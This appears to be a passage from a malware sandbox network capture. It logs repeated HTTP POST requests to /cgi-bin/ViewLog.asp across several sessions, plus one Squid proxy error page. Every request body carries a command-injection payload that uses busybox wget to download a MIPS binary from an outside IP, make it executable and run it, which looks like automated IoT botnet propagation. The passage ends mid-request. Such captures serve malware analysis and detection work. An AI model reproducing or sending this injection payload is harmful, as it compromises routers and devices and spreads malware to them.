                                              Nov 23, 2023 05:17:07.110352039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.718405008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.678378105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.366298914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.230205059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              374192.168.2.133663895.87.241.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.173703909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              375192.168.2.134234094.131.59.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.697217941 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:03.799503088 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:03 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              376192.168.2.134256831.136.202.1608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.781032085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:06.854363918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.998356104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.030358076 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.606343031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              377192.168.2.133871831.136.181.1878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.883887053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.454417944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:05.606381893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.878356934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.486365080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.702406883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.414271116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.278290987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              378192.168.2.133670695.214.179.1908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.890145063 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.134412050 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.278383017 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
